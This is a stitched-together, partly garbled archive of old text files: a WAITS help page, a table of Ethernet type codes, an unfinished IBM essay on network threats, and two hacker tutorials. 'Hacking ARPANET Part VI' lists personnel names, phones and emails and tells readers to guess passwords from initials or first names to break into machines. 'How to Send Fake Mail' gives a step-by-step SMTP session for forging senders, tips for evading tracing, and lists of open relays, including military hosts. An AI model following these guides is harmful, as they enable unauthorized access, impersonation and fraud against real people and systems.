to you. Type "HELP SEND" for more info.
.HELP WHEN
Typing WHEN prints out your most recent logout time, and the directory which
did the logging out. The fact that you are currently logged in does not affect
this information. As with FINGER, system crashes are not considered to be
"loggig out". Also, if your directory was deleted when you logged out, it will
not be included by WHEN. The WHEN command also takes optional arguments. If
only a single argument is given, it may be typed as:
WHEN FOO
If more than one argument is used, separate them by semicolons, not commas. The
various argument forms are:
. Report only on current directory.
* Give latest logouts for all of your directories.
PRG Give latest logout from among PRG's directories.
*,PRG Give logouts for all of PRG's directories.
PRJ,* Give logouts for all directories with project PRJ.
PRJ,PRG Give latest logout for the single directory [PRJ,PRG].
*,* Give logout for every directory (not recommended).
Note that brackets are not included in any of the options. If you are aliased,
the . and * options will use the aliased ppn. For example:
WHEN DON;*;S,SYS;ME
would tell you when DON last logged out (and from which of his directories),
list all directories for you (or for whomever you're aliased to) with logout
times, give the latest logout for [S,SYS], and finally tell you when ME last
logged out.
If one or more of the directories being listed happens to be logged in at the
moment, a note will be printed to that effect. If you have asked for the
latest from among all of someone's directories (including your own, which is
the default), then you will be told if that user is logged in on ANY of his
directories. (In the other cases, such as "*,PRG" or "PRJ,PRG" or "." options,
you are told only if the specific directory is logged in.)
Note that, even if you are not interested in the logout information, you can
use WHEN *,FOO to get a list of all of FOO's directories. The other
command for doing this is DIR [*,FOO]/Q/F. It turns out that WHEN is
significantly faster and uses fewer disk ops. WHEN is also much faster than
FINGER for finding out logout times or for finding out whether a specific person
is currently logged in (though WHERE)
an
FINGER for finding out logout times or for finding out whether a specific person
is currently logged in (though WHERE)
+355
View File
@@ -0,0 +1,355 @@
***************************************
Hacking ARPANET -- Part VI
by
The Source
***************************************
This last part of the Hacking ARPANET series provides some more iformation
on the types of things that you can learn from the EXEC, and concludes by
explaining how to log onto the system and how passwords are structured.
Once you are onto the EXEC, as explained in Part I, you should get into
the QUERY function which is also explained earlier. QUERY will tell you just
about all you need to know about anyone, including their business phone numbers
and the locations of certain military employees.
@N
TOP
NIC/Query is a database system containing information about the Defense Data
Network (DDN)...
1. INTERNET PROTOCOLS -- Describes Internet protocols
2. PROGRAMS -- Describes programs available on DDN hosts
3. PERSONNEL -- Directory of DDN users
4. HOSTS -- Describes DDN hosts
5. RFCS -- Requests For Comments technical notes
6. IENS -- Internet Experiment Notes
7. NIC DOCUMENTS -- Documents available from the NIC
_ for back, ^ for up, + for top, or menu # (1-7): 4
HOSTS
-----
We have selected menu item 4, "HOSTS".
HOSTS -- Describes DDN hosts
1. BY NAME -- Description of hosts by DDN hostname
2. BY CPU -- List of hosts by CPU type
3. BY OS -- List of hosts by Operating System
_ for back, ^ for up, + for top, or menu # (1-3): 1
If we were especially interested in working on one or another computer, a
CRAE, for example, we would select menu item 2. Or, if we wanted to learn a new
operating system, we could select menu item 3. But let's see what's available
under menu item 1:
HOSTS BY NAME -- Description of hosts by DDN hostname
To show the entry for a host, type its official name or nickname.
To get a menu of hostnames, select the appropriate choice below.
1. ARPANET HOSTS-A-G
2. ARPANET HOSTS-H-R
3. ARPANET HOSTS-S-Z
4. MILNET HOSTS-A-F
5. MILNET HOSTS-G-M
6. MILNET HOSTS N
7. MILNET HOSTS-O-Z
8. ARPANET TACS
9. MILNET TACS
10. GATEWAYS
_ for back, ^ for up, + for top, or menu # (1-10): 10 <let's take a look>
GATEWAYS
1. AERONET-GW 2. AMES-NAS-GW 3. ARPA-MILNET-GW
4. BBN-CRONUS-GW 5. BBN-FIBERA-GW 6. BBN-MILNET-GW
7. BBN-MINET-A-GW 8. BBN-NET-GATEWAY 9. BBN-PR-GW
10. BBN-VAN-GW 11. BBN-X25-GW 12. BRAGG-PR-GW1
13. BRAGG-PR-GW2 14. BRL-GATEWAY 15. BRL-GATEWAY2
16. CIT-CS-GW 17. CMU-GATEWAY 18. COLUMBIA-GW
19. CORNELL-GW 20. CSNET-PDN-GW 21. CSS-GATEWAY
22. CSS-RING-GW 23. DARPA-GW 24. DCEC-GATEWAY
25. DCEC-MILNET-GW 26. DCEC-PSAT-IG 27. DCN-GATEWAY
28. DTNSRDC-GW 29. HARVARD-GW 30. HUEY-GW
31. IPTO-GW 32. ISI-GATEWAY 33. ISI-MCON-GW
34. ISI-MILNET-GW 35. ISI-PSAT-IG 36. LBL-MILNET-GW
37. LL-GW 38. LL-PSAT-IG 39. LOUIE-GW
40. MARYLAND-GW 41. MIT-GW 42. NLM-GW
43. NOSC-GW 44 NRL-CSS-GW 45. NSRDCOA-GW
4.. NYU-GW 47. PURDUE-CS-GW 48. RAD-PSAT-IG
49. RIACS-GW 50. S1-B-GW 51. SAC-GATEWAY
52. SAC-GW-2 53. SAC-MILNET-GW 54. SRI-C3ETHER-GW
55. SRI-MILNET-GW 56. SRI-PR-GW1 57. SRI-PR-GW2
58. SRI-PR-GW3 59. STANFORD-GATEWAY 60. TACTNET-GW
61. UDEL-GW -- University of Delaware
62. UR-CS-GW -- University of Rochester
63. UTAH-GATEWAY -- University of Utah
64. UW-VLSI-GW -- University of Washington
65. WISC-GATEWAY -- University of Wisconsin
66. WSMR-NET-GW -- White Sands Missile Range
67. YALE-GW -- Yale University
68. YUMA-GW -- Army Yuma Proving Ground
<menu item 9>
MILNET TACS
1. ACCAT-TAC 2. AFGL-TAC
3. AFSC-AD-TAC 4. AFSC-HQ-TAC
5. AFSC-SD-TAC 6. AFWL-TAC
7. AMES-TAC 8. ANNIS-MIL-TAC
9. ARDC-TAC 10. ARPA1-MIL-TAC
11. ARPA2-MIL-TAC 12. BBN-MIL-TAC
13. BRL-TAC 14. BROOKS-AFB-TAC
15. CINCPAC-TAC 16. CORADCOM-TAC
17. CORADCOM2-TAC 18. DARCOM-TAC
19. DAVID-TAC 20. DCEC-MIL-TAC
21. DCEC-TAC 22. DDN-PMO-MIL-TAC
23. DUGWAY-MIL-TAC 24. FRANKFURT-MIL-TAC
25. GUNTER-TAC 26. KOREA-TAC
27. MICOM-TAC 28. MINET-BRM-TAC
29. MINET-CPO-TAC 30. MINET-HDL-TAC
31. MINET-HLH-TAC 32. MINET-LON-TAC
33. MINET-OBL-TAC 34. MINET-RAM-TAC
35. MINET-RDM-TAC 36. MINET-SIG-TAC
37. MINET-VHN-TAC 38. MITRE-TAC
39. NCAD-MIL-TAC 40. NORL-MIL-TAC
41. NPS-TAC -- Naval Postgraduate School
42. NSWC-TAC -- Naval Surface Weapons Center
43. NWC-TAC -- Naval Weapons Center
44. PAX-RV-TAC -- Naval Electronics Systems Command
45. PENTAGON-TAC -- Air Force Data Services Center/SFA
46. RADC-TAC -- Rome Air Development Center
47. RAND2-MIL-TAC -- The Rand Corporation
48. ROBINS-TAC -- Warner-Robins ALC/MMECDM
49. SAC1-MIL-TAC -- Strategic Air Command/ADXCC Headquarters
50. SAC2-MIL-TAC -- Headquarters, Strategic Air Command
51. SCOTT-TAC -- Air Force Communications Command
52. SCOTT2-MIL-TAC -- Air Force Communications Command
53. SRI-MIL-TAC -- SRI International
54. STLA-TAC -- Army Information Systems Command - St. Louis
55. TINKER-MIL-TAC -- Tinker Air Force Base
56. USGS2-TAC -- U.S. Geological Survey
57. USGS3-TAC -- U.S. Geological Survey
58. WPAFB-TAC -- Aeronautical Systems Division/ADOS
59. WSMR-TAC -- White Sands Missile Range
60. YUMA-TAC -- Army Yuma Proving Ground
<If you're interested in more information about the system, simply enter its
menu number as in the examples below:>
43. NWC-TAC -- Naval Weapons Center
SRI-MIL-TAC
SRI International (SRI-MIL-TAC)
Telecommunications Sciences Center
Network Information Center
333 Ravenswood Avenue
Menlo Park, California 94025
NetNumber: 26.3.0.73
Configuration: C/30
Protocols: TCP/TELNET,ICMP
Liaison:
Roode, R. David ROODE@SRI-NIC
(RAND2-MIL-TAC)
Room 145
1700 Main Street
Santa Monica, California 90406
NetNumber: 10.0.0.7
Configuration: C/30
Protocols: TCP/TELNET,ICMP
Liaison:
Collins, Colleen S. Colleen@RAND-UNIX
(213) 393-0411
<note that the data always includes the system's network number, NetNumber,
this is a useful feature if you want to use your local node to dial up the
remote system>
PROGRAMS
--------
The EXEC also stores a list of programs and you can find out where to
look for them on various network nodes. The programs are organized by menu
as in the examples below:
PROGRAMS
1. BY NAME
2. PROGRAM LIST
2
PROGRAM LIST
1. 11COPY 2. 2LABEL 3. @ 4. PROGRAMS-A
5. PROGRAMS-B 6. PROGRAMS-C 7. PROGRAMS-D 8. PROGRAMS-E
9. PROGRAMS-F 10. PROGRAMS-G 11. PROGRAMS-H 12. PROGRAMS-I
13. PROGRAMS-J 14. PROGRAMS-K 15. PROGRAMS-L 16. PROGRAMS-M
17. PROGRAMS-N 18. PROGRAMS-O 19. PROGRAMS-P 20. PROGRAMS-Q
21. PROGRAMS-R 22. PROGRAMS-S 23. PROGRAMS-T 24. PROGRAMS-U
25. PROGRAMS-V 26. PROGRAMS-W 27. PROGRAMS-X 28. PROGRAMS-Y
29. PROGRAMS-Z
menu # (1-29): <note there are 29 flavors, but we're choosing flavor 3>
@
Examines a file and creates a checksum of each page. Upon subsequent runs it
will detect which pages have changed and print only the altered pages, so that
they can be added to the existing listing in place of the old pages. Has
special features for updating cross-reference listings from compilers.
CMU hosts (called AT)
MIT-AI
MIT-ML
MIT-MC
SRI-KL
<it wasn't very thriling, but the hosts that offer the feature are listed in
case we want to use it. Let's try another menu selection, #4>
4
PROGRAMS-A
1. A6502 2. ACCTS
3. ACT 4. ACTFRK
5. ADA 6. ADUMP
7. AGE-1 8. AGII
9. AI-HANDBOOK 10. AID
11. AIQUIZ 12. ALG606
13. ALGOL 14. ALGOL-W
15. ALIAS 16. ALLPRT
17. ALTER 18. ALTER.SNO
19. ALTRAN 20. ANALYSIS
21. ANALYZ 22. APEX-III
23. APL 24. APL.GST
25. APL25.KST 26. APLCOM
27. APLED 28. APT-III
29. ARCBITS 30. ARCHIVE-LOOKUP
31. ASSEMBLER-F 32. ASSEMBLER-G
33. ASSEMBLER-HONEYWELL 34. ASSEMBLER-IBM
35. ASSIST 36. AT
37. AUG3 38. AUGMEN
39. AUGMENT
<again, for more information, type your selection>
9
AI-HANDBOOK
The AI Handbook is aimed at making the results of AI research accessible to
the large, multi-disciplinary community of scientists who want to build AI
systems in their own problem areas. Students and researchers at Stanford
and other AI laboratories have prepared over 300 short articles describing the
fundamental ideas, useful thechniques, and exemplary programs developed in the
field over the last 20 years. These articles have been written for computer-
literate scienists and engineers in other fields who are unfamiliar with AI
reserch and jargon. The Handbook will provide a scientist who, for instnce,
might want to knoge" front end, with information about all of the relevant AI
techniques and existing systems, as well as abundant pointers into the field's
literature.
SUMEX-AIM
menu # (1-39): 15
ALIAS
Allows a dummy name to be set up for a program.
CMU hosts
SUMEX-AIM
SRI-KL
menu # (1-39): 35
ASSIST
ASSIST is a compiler fo a large subset of the IBM Assembler Language
instruction set. ASSIST is oriented toward instructional use but is also
useful for program checkout. ASSIST features simplified I/O statements and
detailed assembly and execution error messages. ASSIST was developed at
Pennsylvania State University and the University of Tennessee.
UCLA-CCN
menu # (1-39): 3
ACT
Acquisition of Cognitive Procedures, combines a semantic network data-base with
a production system to simulate human cognition. ACT possesses a number of
learning mechanisms which have been used to model the learning of procedural
skills such as language comprehension and geometry theorem proving. It can also
model human limitations.
SUMEX-AIM
menu # (1-39): PERSONNEL
To view information about an individual when you know his or her LAST NAME
Type: LASTNAME <CR> (where 'LASTNAME' is the person's last name; e.g.,
Smith)
PARTIAL NAME
Type: LASTN... <CR> (where 'LASTN...' is a partial spelling of the person's
last name followed by three periods, e.g., Sm...)
FULL NAME
Type: FULLNAME <CR> (where 'FULLNAME' is the person's last name followed
by a comma and his or her first name; e.g., Smith, Mary)
IDENT
Type: XYZ <CR> (where 'XYZ' is the ident)
<so let's try one...>
MA...
There are 631 matching entries.
<oops, for the purpose of this printout we'll just show a few of them>
Accetta, Michael (MA) MIKE.ACCETTA@CMU-CS-A (412) 578-7681
Asato, Mino (MA1) NEEAPAC@HAWAII-EMH (808) 471-3444 (AV) 421-6834
Amaro, Manny (MA10) MAMARO@SIMTEL20 (505) 678-9500 (AV) 258-9500 (FTS) 898-9
500
Aguilar, Mary (MA11) mary@RAND-UNIX (213) 393-0411
Aronstein, Michael (MA12) ARONSTEIN@BBNA (619) 224-3243
Adams, Marilyn (MA13) MADAMS@BBNA (617) 497-3678
Abe, Michael (MA14) PACDET@PAXRV-NES (808) 471-0821
Ackerman, Mark (MA15) ACKERMAN@JPL-VLSI (818) 354-4467
Altenau, Mike (MA17) CENCOMS-F4@USC-ISID --
Addison, Michael (MA19) MARCOMMS@PAXRV-NES (703) 521-8835
Allerding, Martin (MA20) 600140@LANL (703) 326-7028
...
LOGIN
-----
ARPANET very graciously tells us just about all we know to be able to log
into the system in the related HELP file below:
.HELP LOGIN
Only people with authorized accounts may log in on this system, though some
programs can be run without logging in. Type "HELP GUEST" for a list of these
"free" programs. Type "HELP ACCOUNT" for information on opening an account.
To log in, type the word LOGIN (this may be abbreviated L) followed by a
space, your project name, a comma, and your programmer name:
L PRJ,PRG
This will lo you in, and type out any system messages or personal mail for you
wich may exist. You can stop the message typeout by typing the CALL eg
(CONTROL-C twice from other characters in place of the "," namely:
/ - types only system messages that have been posted since you last logged in.
. - suppresses all messages.
% - lets you specify a new password.
In order to log in from the network or remotely, you must have a password.
For a more complete description of LOGIN options, see the printed Monitor
Command Manual or its online version MONCOM.BH[S,DOC], whose updates are in
MONCOM.UPD[S,DOC].
Rembember, ARPANET has already shown us how to find out the PRG
(programmer name) part of the login:
.FINGER INT where INT are the initials of a programmer. If the initials don't
exist you will get an error message. Keep trying until you find the correct
initials.
Passwords are often the same as the programmer's initials. If not, then
try the programmer's first name which you can learn from using the Personnel
option on the menu in the Exec's QUERY.
Once you have a password, you may then log onto just about any ARPANET
computer. Instead of typing "O 0,11", enter the machine's NetWork number!
All that's left to be hacked is the first section of the logon code --
the PRJ name, which may be as long as three letters and which may include
nubmers.
HAPPY HACKING!
THIS SERIES OF ARTICLES WAS BROUGHT TO
YOU BY **THE SOURCE**. COPY IT; SPREAD
IT AROUND; USE IT FREELY BUT DON'T
FORGET TO PUT THE AUTHOR'S NAME IN IT
+180
View File
@@ -0,0 +1,180 @@
%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$
$%$ %$%
%$% Ethernet Fields $%$
$%$ %$%
%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%
This is dedicated to The Prophet :
Below are the current lists of values known at BBN for: Ethernet
Type Fields; Ethernet Address Vendor assignments; Ethernet
Multicast Address assignments. As these values are not published
by the IEEE, we maintain these lists for OUR use, and for distribution.
Current Ethernet and IEEE802.3 "Type" Fields 5/5/88
The 13th and 14th octets of an Ethernet or IEEE802.3 packet (after the preamble)
consist of the "Type" or "Length" field. These are formerly assigned by
Xerox, currently assigned by IEEE. Some assignments are public, others private.
Information currently available includes: Xerox Public Ethernet Packet
Type documentation; IEEE802.3 Std, but not yet further documentation from
IEEE; NIC RFC960; knowledge of some BBN Private Type Field values.
Hex
0000-05EE IEEE802.3 Length Field
0600 Xerox NS IDP *
0800 DOD Internet Protocol (IP) * #
0801 X.75 Internet
0802 NBS Internet
0803 ECMA Internet
0804 CHAOSnet
0805 X.25 Level 3
0806 Address Resolution Protocol (ARP) * (for IP and for CHAOS)
0807 XNS Compatibility
081C Symbolics Private
1000 Berkeley Trailer negotiation
1001-100F Berkeley Trailer encapsulation
1600 VALID-machine protocol? *
5208 BBN Simnet Private %
6000 DEC unassigned
6001 DEC Maintenance Operation Protocol (MOP) Dump/Load Assistance
6002 DEC Maintenance Operation Protocol (MOP) Remote Console
6003 DECNET Phase IV
6004 DEC Local Area Transport (LAT)
6005 DEC diagnostic protocol (at interface initialization?)
6006 DEC customer protocol
6007 DEC Local Area VAX Cluster (LAVC)
6008 DEC unassigned
6009 DEC unassigned
8003 Cronus VLN
8004 Cronus Direct
8005 HP Probe protocol
8006 Nestar
8010 Excelan
8035 Reverse Address Resolution Protocol (RARP)
8038 DEC LanBridge Management
8039 DEC unassigned
803A DEC unassigned
803B DEC unassigned
803C DEC unassigned
803D DEC Ethernet Encryption Protocol
803E DEC unassigned
803F DEC LAN Traffic Monitor Protocol
8040 DEC unassigned
8041 DEC unassigned
8042 DEC unassigned
805B Stanford V Kernel, experimental
805C Stanford V Kernel, production
809B EtherTalk (AppleTalk over Ethernet)
80F3 AppleTalk Address Resolution Protocol (AARP)
9000 Loopback (Configuration Test Protocol)
FF00 BBN VITAL-LanBridge cache wakeups %
* These protocols use Ethernet broadcast, where multicast would be preferable.
# BBN Butterfly Gateways also use 0800 for non-IP, with IP version field = 3.
% BBN Private Protocols, not registered
E 4/29/88
Ethernet hardware addresses are 48 bits, expressed as 12 hexadecimal digits
(0-9, plus A-F, capitalized). These 12 hex digits consist of
the first/left 6 digits (which should match the vendor of the Ethernet interface
within the station) and the last/right 6 digits which specify the interface
serial number for that interface vendor.
Currently we have noted the following vendor addresses, on the
BBN Corporate Ethernet.
000093 Proteon
0000AA Xerox Xerox machines
000102 BBN BBN internal usage (not registered)
00DD00 Ungermann-Bass
020701 Interlan UNIBUS or QBUS machines
020406 BBN BBN internal usage (not registered)
02608C 3Com IBM PC; Imagen; Valid
02CF1F CMC Masscomp
080002 Bridge
080005 Symbolics Symbolics LISP machines
080009 Hewlett-Packard
080010 AT+T
080014 Excelan BBN Butterfly, Masscomp
08001A Data General
08001E Apollo
080020 Sun Sun machines
080028 TI Explorer
08002B DEC UNIBUS or QBUS machines, VAXen, LANBridges
(DEUNA, DEQNA, DELUA)
080047 Sequent
08004C Encore
080068 Ridge
080089 Kinetics AppleTalk-Ethernet interface
08008B Pyramid
08008D XyVision XyVision machines
AA0003 DEC Physical address for some DEC machines
AA0004 DEC Logical address for systems running DECNET
Ethernet addresses might be written unhyphenated (e.g. 123456789ABC),
or with one hyphen (e.g. 123456-789ABC), but should be written hyphenated
by octets (e.g. 12-34-56-78-9A-BC).
These addresses are physical station addresses, not multicast nor
broadcast, so the second hex digit (reading from the left)
will be even, not odd.
At present, it is not clear how the IEEE assigns Ethernet block addresses.
Whether in blocks of 2**24 or 2**25, and whether multicasts are assigned
with that block or separately. A portion of the vendor block address
is reportedly assigned serially, with the other portion intentionally
assigned randomly. If there is a global algorithm for which addresses
are designated to be physical (in a chipset) versus logical
(assigned in software), I am unaware of the algorithm.
Cdresses 5/5/88
Ethernet Type
Address Field Usage
Multicast Addresses:
09-00-2B-01-00-01 8038 DEC LanBridge Hello packets
1 packet per second, sent by the
designated LanBridge
AB-00-00-01-00-00 6001 DEC Maintenance Operation Protocol (MOP)
Dump/Load Assistance
AB-00-00-02-00-00 6002 DEC Maintenance Operation Protocol (MOP)
Remote Console
1 System ID packet every 8-10 minutes, by every:
DEC LanBridge
DEC DEUNA interface
DEC DELUA interface
DEC DEQNA interface (in a certain mode)
AB-00-00-03-00-00 6003 DECNET Phase IV end node Hello packets
1 packet every 15 seconds, sent by each DECNET host
AB-00-00-04-00-00 6003 DECNET Phase IV Router Hello packets
1 packet every 15 seconds, sent by the DECNET router
AB-00-00-05-00-00 ???? Reserved DEC
through
AB-00-03-FF-FF-FF
AB-00-04-00-00-00 ???? Reserved DEC customer private use
through
AB-00-04-FF-FF-FF
AB-00-04-01-xx-yy 6007 DEC Local Area VAX Cluster
(LAVC Cluster group yy)
CF-00-00-00-00-00 9000 Ethernet Configuration Test protocol (Loopback)
Broadcast Address:
FF-FF-FF-FF-FF-FF 0600 XNS packets, Hello or gateway search?
6 packets every 15 seconds, per XNS station
FF-FF-FF-FF-FF-FF 0800 IP (e.g. RWHOD via UDP) as needed
FF-FF-FF-FF-FF-FF 0806 ARP (for IP and CHAOS) as needed
FF-FF-FF-FF-FF-FF 1600 VALID packets, Hello or gateway search?
1 packets every 30 seconds, per VALID station
----------------------------------------------------------------------------

+226
View File
@@ -0,0 +1,226 @@
How to Send Fake Mail Using SMTP Servers
By Hunter
hunter@wicked.gt.ed.net
---------------------------------------------------------------------------
Overview
SMTP (Simple Mail Transfer Protocol) is the protocol by which Internet mail
is sent. SMTP servers use this protocol to communicate with other servers
or mail clients. However, by telneting directly to a mail server and
manually speaking SMTP, one can easily send mail from any address specified
- meaning that mail can be sent from fake addresses while the sender's real
address is untraceable.
What is Needed?
All that you need is a generic telnet client. Local echo should be turned
on so you can see what you type. Also, it is important to note that SMTP
servers do not handle backspaces, so you must type everything correctly.
How do I Start?
Telnet to port 25 of your target SMTP server (more on SMTP servers
selection below). The server should respond with a generic welcome message.
You will type HELO domain.name. Use any domain name you wish as most
servers do not check the name against the IP you are telneting from. Type
MAIL FROM: <from@wherever.com>. This is where the message will appear to be
from. Next, type RCPT TO: <to@wherever.com>. This specifies who will
receive the message. Type DATA and type the body of your message. To send
the message, enter a line with only a period. Type QUIT to disconnect.
Sample Session
220 hq.af.mil Sendmail 4.1/Mork-1.0 ready at Thu, 14 Mar 96 00:26:46 EST
HELO prometheus.com
250 hq.af.mil Hello prometheus.com (prometheus.com), pleased to meet you
MAIL FROM:<satan@hell.net>
250 <satan@hell.net>... Sender ok
RCPT TO:<OJ@simpson.com>
250 <OJ@simpson.com>... Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
This is the body of my message.
.
250 Mail accepted
QUIT
221 hq.af.mil delivering mail
What about message subjects?
The subject, date, to, etc. are part of the DATA area. After the DATA
command, start with date and continue is the fashion illustrated by the
example code below. Make sure there are no mistakes, because the first
mistake will cause the data to appear in the body of the message, not
header. It is interesting, because these fields take precedence over the
MAIL FROM: and RCPT TO: when displaying. A message can be routed to a
person even though the message itself appears to be addressed to someone
else. The key is to type VERY carefully.
Example:
DATA
Date: 23 Oct 81 11:22:33
From: SMTP@HOSTY.ARPA
To: JOE@HOSTW.ARPA
Subject: Mail System Problem
Sorry JOE, your message to SAM@HOSTZ.ARPA lost.
HOSTZ.ARPA said this:
.
End Example
Can my mail be traced?
Yes, the IP address you mailed from can be traced if you are not careful.
All mail will show a line in the header listing the IP address that you
originally telneted from. If the person you are sending mail to doesn't
know much about IP's and the like, you shouldn't worry too much.
Furthermore, depending on your the nature of your connection, there are
different implications. For instance, if you have a direct connection, you
can be easily traced by your IP address. On the other hand, if you have a
dial-in connection or service such as AOL, you will not have a defined IP
address. You will be assigned a temporary one. The only way your mail can
be traced with this type of connection is to check against the dial in
service's system logs. The take-home message is that you are safe with this
type of connection unless you do something really stupid. Finally, the best
case scenario is a public access terminal with no logging. This type
connection is untraceable.
Author's Note: I have found some servers that don't log IP. Read No IP SMTP
Server
What SMTP servers can I use?
An easy (but hit-or-miss) way to find random SMTP servers is to look at web
addresses on Yahoo! or another search engine. Universities and government
agencies are always good choices. Find a URL and telnet to port 25. If you
get a response, you have located an available server. 95% of servers will
accept your mail. The others will not allow external mail forwarding for
security reasons. Always test the server first.
OR
Check Hunter's List of Usable SMTP Servers. All servers on this list have
been tested and will work. A hyptertext interface makes it easy to use the
servers.
---------------------------------------------------------------------------
Apocalypse 95
Last revision: 3.15.96
Mail to: hunter@wicked.gt.ed.net
Hunter's List of SMTP Servers
By Hunter
hunter@wicked.gt.ed.net
---------------------------------------------------------------------------
Note: There is no guarantee that the administrators of these servers will
be happy if you use the servers. I am only acknowledging the existence of
these servers. For a server that doesn't stamp your IP on the message
header, read No IP SMTP Server
If you have a telnet client set up as a helper app to your web browser,
simply click on the name of a server to use the server for direct mail.
Some links may be slow.
centerof.thesphere.com
misl.mcp.com
jeflin.tju.edu
arl-mail-svc-1.compuserve.com
alcor.unm.edu
mail-server.dk-online.dk
lonepeak.vii.com
burger.letters.com
aldus.northnet.org
netspace.org
mcl.ucsb.edu
wam.umd.edu
atlanta.com
elmer.anders.com
venus.earthlink.net
urvax.urich.edu
vax1.acs.jmu.edu
loyola.edu
cornell.edu
brassie.golf.com
quartz.ebay.gnn.com
acad.bryant.edu
palette.wcupa.edu
utrcgw.utc.com
umassd.edu
trilogy.usa.com
mit.edu
corp-bbn.infoseek.com
vaxa.stevens-tech.edu
ativan.tiac.net
miami.linkstar.com
wheel.dcn.davis.ca.us
kroner.ucdavis.edu
ccshst01.cs.uoguelph.ca
server.iadfw.net
valley.net
grove.ufl.edu
cps1.starwell.com
unix.newnorth.net
mail2.sas.upenn.edu
nss2.cc.lehigh.edu
pentagon.mil
blackbird.afit.af.mil
denise.dyess.af.mil
cs1.langley.af.mil
wpgate.hqpacaf.af.mil
www.hickam.af.mil
wpgate.misawa.af.mil
guam.andersen.af.mil
dgis.dtic.dla.mil
www.acc.af.mil
redstone.army.mil
---------------------------------------------------------------------------
Apocalypse 95
Last revison: 3.30.96
Mail to: hunter@wicked.gt.ed.net
Mail Servers with No IP Logging
Number of Servers that have updated Sendmail versions due to my list
[Image]
---------------------------------------------------------------------------
When I wrote How to Send Fake Mail Using SMTP Servers, I said that your
messages are traceable by your IP address (it will always be stamped in the
header). Well, slowly, I am finding systems that don't append your IP to
the message. You can send messages through this servers, using the
techniques I described in my SMTP fakemail tutorial, and they are totally
untraceable. If you have a telnet client set as a helper app to your
broweser, all you have to do is click on the link below, and you will be
connected to the respective SMTP server.
DO NOT DO ANYTHING REALLY STUPID WITH THESE SERVERS. If a server was posted
on this list, but isn't now, don't use it! Don't say that I didn't warn
you.
cvo.oneworld.com
www.marist.chi.il.us
bi-node.zerberus.de
underground.net
alcor.unm.edu
venus.earthlink.net
mail.airmail.net
---------------------------------------------------------------------------
Apocalypse 95
---------------------------------------------------------------------------
How to find your own IP-Less Severs:
Finding your own servers that do not append IP to message headers is a
relatively easy process if you know what to look for. There are many SMTP
server programs out there. Sometimes you will hit an odd system with an
unusual server program that you can test by hand. However, the easiest way
it to look for the more common ones. By far, the easiest to look for is a
certain older Sendmail version that many systems still use. To find it,
connect with a server as usual. Examine the welcome text. You are looking
for a line that looks like the following:
220 xxxx.xxxx.xxx Smail3.1.29.1 #15 ready at Mon, 10 Jan 96 12:34 EDT
The important part is the Smail3.1.29.1. If you find a server with this
number, 3.1.29.1, or another 3.x.x.x number, you have what you are looking
for.
---------------------------------------------------------------------------
Last Revision: 4.21.96
hunter@wicked.gt.ed.net
+150
View File
@@ -0,0 +1,150 @@
[Image]
Things that Go Bump in the Net
This is a brief look at some of the more colorful characters in the
menagerie of network security threats, with an emphasis on how they relate
to agent-based systems. The Massively Distributed Systems group in IBM
Research conducts research into these and other emergent concerns in future
distributed systems.
----------------------------------------------------------------------------
Trojan horses
A Trojan horse is a program that does something that the programmer
intended, but the user would not approve of if he knew about it in advance.
Because most current security systems are based primarily on user-level
privilege rather than program-level privilege, any program that you run can
read any object you have read-access to, write to any object that you have
write-access to, and execute any program or command that you are authorized
to execute.
A Trojan horse concealed in a random game program downloaded from your
favorite newsgroup can read any file you have read access to, and mail it
anywhere in the world. It can erase, or just shuffle around a few bytes in,
any file you can write to. It can send obscene messages to the White House,
or post embarassing things to random newsgroups.
And it can copy itself into any program that you have write access to (see
Viruses and Worms below).
In a mobile-agent system, it is critical to ensure that arriving agents
execute in a controlled environment, and are able to do only those things
that they are authorized to do. Agents should be trusted only as far as the
least-trusted entity that may have been able to alter the program or
internal state of the agent; secure authentication methods (such as digital
signatures) must be used carefully when it is necessary to establish the
real author or sender of an agent. See Itinerant Agents for Mobile Computing
for some related security considerations in these sorts of systems.
----------------------------------------------------------------------------
Viruses and Worms
A virus is a program (generally a Trojan horse) that spreads, by making
copies of iteslf in one way or another. In the microcomputer environment,
viruses generally spread by writing copies of themselves into other
programs, or into boot records of disks and diskettes. (For more information
on computer viruses in PC-compatible machines, see the IBM Computer Virus
Information Center.)
A worm in a networked environment is generally a self-sufficient program
that spreads by spawning copies of itself on other hosts in the network. One
famous worm caused great disruption on the Internet in 1988. There is no
hard line between viruses and worms; in general, if the spreading entity is
a self-sufficient program, it will be called a worm, whereas if it embeds
itself inside other programs or boot code, it will be called a virus.
Can a virus spread between agents in a mobile-agent system? So far, the
consensus seems to be that there is no particular reason to allow one agent
to alter the code of another already-existing agent. If the agent
infrastructure does not allow this, no virus will be able to spread from
agent to agent. On the other hand, if the infrastructure accidentally or
purposely does allow one agent to alter another, inter-agent viruses will be
possible.
Are worms possible in mobile-agent systems? If one agent can create another
agent, the possibility of runaway worm reproduction exists. Agent
reproduction must be controlled in one way or another to limit the
possibility; if agents can create other agents, they must be charged in some
scarce currency, or limited in how large their tree of descendants can get,
or otherwise kept from having children and grandchildren without bound.
----------------------------------------------------------------------------
Flash Crowds
The term Flash Crowd was first used by Larry Niven, in a science fiction
short story. In the story, cheap local teleportation has become possible;
now, the sites of attractive news stories are instantly innundated with
rubberneckers teleporting in to watch.
As systems become more interconnected and more powerful, we have the
equivalent of cheap teleportation; if a Web site becomes known as
particularly interesting, its usage curve can go exponential, causing
network bottlenecks and server crashes. In networks of agents, a vast number
of similarly-programmed agents, like a horde of similarly-programmed trading
programs causing a market crash, can cause network congestion and server
overload. And if the agents all adopt similar fallback strategies in
response to overload, the flash crowd can migrate from server to server on
the net, leading to surging hard-to-remedy travelling overloads.
----------------------------------------------------------------------------
Weeds, Freeloaders and Flying Dutchmen
A weed is a program (or anything else in a system) that does no one any
good, but that uses such a small amount of resources that it's often not
cost-effective to do anything about it. Eventually, weeds start to
accumulate, and it's time to get out the clippers. Or the herbicide.
A freeloader is a program that uses some system or server resources to
survive and possibly benefit its creator, without paying for them. Servers
may provide some minimal service for free, in order to attract paying
customers, or unintentionally, as an unintended effect of complex cost
structures; there may be ways to arrange for some transaction charges,
especially small ones, to be lost in the shuffle. A freeloader exploits
these sorts of things to operate free of charge.
Named for the legendary ghost-ship, a Flying Dutchman is a freeloader that
manages to become effectively immortal, without paying for the resources
